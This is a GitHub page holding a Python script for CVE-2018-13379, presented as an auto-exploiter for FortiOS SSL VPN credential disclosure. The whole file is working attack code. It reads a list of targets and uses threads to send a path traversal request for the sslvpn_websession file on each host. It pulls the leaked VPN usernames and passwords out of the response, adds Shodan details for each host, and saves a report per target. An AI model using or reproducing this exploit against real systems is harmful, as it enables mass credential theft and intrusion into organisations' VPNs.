-
Notifications
You must be signed in to change notification settings - Fork 5
/
CVE-2018-13379.py
135 lines (125 loc) · 4.58 KB
/
CVE-2018-13379.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
import requests, sys, time
import lxml.html as lh
import pandas as pd
import urllib3
import thread
import time
import sys
import os
urllib3.disable_warnings()
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
print(bcolors.HEADER + bcolors.BOLD + " [>] " + bcolors.OKGREEN + "FortiOS Credentials Disclosure - Auto Exploiter" + bcolors.ENDC)
print(bcolors.HEADER + bcolors.BOLD + " [>] " + bcolors.OKGREEN + "Exploit Dev : 0xHunter" + bcolors.ENDC + '\r\n')
def leak(host, port):
try:
url = "https://"+host+":"+port+"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
headers = {"User-Agent": "Mozilla/5.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
r=requests.get(url, headers=headers, verify=False, stream=True)
img=r.raw.read()
if "var fgt_lang =" in str(img):
with open("sslvpn_websession_"+host+".dat", 'w') as f:
f.write(img)
parse(host,port)
print("\n")
return True
else:
return False
except requests.exceptions.ConnectionError:
return False
def is_character_printable(s):
return all((ord(c) < 127) and (ord(c) >= 32) for c in s)
def is_printable(byte):
if is_character_printable(byte):
return byte
else:
return '.'
def read_bytes(host, chunksize=8192):
with open("sslvpn_websession_"+host+".dat", "rb") as f:
while True:
chunk = f.read(chunksize)
if chunk:
for b in chunk:
yield b
else:
break
def parse(host,port):
print(bcolors.BOLD + bcolors.OKBLUE + "[>] " + bcolors.OKGREEN + host + ':' + port + ' Is Vulnerable - Exploiting...' + bcolors.ENDC)
memory_address = 0
ascii_string = ""
report = 'VPN : ' + host + ':' + port + '\r\n'
try:
url = "https://www.shodan.io/host/"+host
headers = {"User-Agent": "Mozilla/5.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
page = requests.get(url, headers=headers)
doc = lh.fromstring(page.content)
tr_elements = doc.xpath('//tr')
info = ''
for t in tr_elements:
name=t.text_content().split('\n')
info += name[1] + ' : ' + name[2] + '\r\n'
report += info + '\r\n'
except Exception as e:
raise e
for byte in read_bytes(host):
ascii_string = ascii_string + is_printable(byte)
if memory_address%61 == 60:
if ascii_string!=".............................................................":
report = report + ascii_string + '\r\n'
#print(report)
ascii_string = ""
memory_address = memory_address + 1
content = str(report)
f = open(host+'.txt', 'w');
f.write(content)
f.close()
os.remove("sslvpn_websession_"+host+".dat");
def check(host, port):
uri = "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
try:
r = requests.get("https://" + host + ":" + port + uri, verify=False)
if(r.status_code == 200):
return True
elif(r.status_code == 404):
return False
else:
return False
except:
return False
def main(host, port):
vuln = check(host, port)
if(vuln):
bin_file = leak(host, port)
else:
print(bcolors.BOLD+bcolors.HEADER+"[-] " + bcolors.OKBLUE+ host + ':' +port + '\tIs Secure ' + bcolors.ENDC)
if len(sys.argv) != 2:
print(bcolors.BOLD+bcolors.HEADER+ " [>] " + bcolors.OKGREEN + 'Usage : python ' + sys.argv[0] + ' List.txt' + bcolors.ENDC)
exit()
file = sys.argv[1]
file = open(file, "r")
urls = file.readlines()
integer_c = 1
for url in urls:
integer_c += 1
if len(urls) == integer_c:
print(bcolors.BOLD+bcolors.HEADER+"[*] " + bcolors.OKGREEN+'List Finished... ' + bcolors.ENDC)
print(bcolors.BOLD+bcolors.HEADER+"[*] " + bcolors.OKGREEN+'Waiting to compelete job... ' + bcolors.ENDC)
print(bcolors.BOLD+bcolors.HEADER+"[*] " + bcolors.OKGREEN+'Code By Kod3r... ' + bcolors.ENDC)
url = url.replace('\n', '')
url = url.split(':')
host = url[0]
if len(url) == 1:
port = '443'
else:
port = url[1]
time.sleep(0.2)
thread.start_new_thread( main, (url[0], port, ) )
while 1:
pass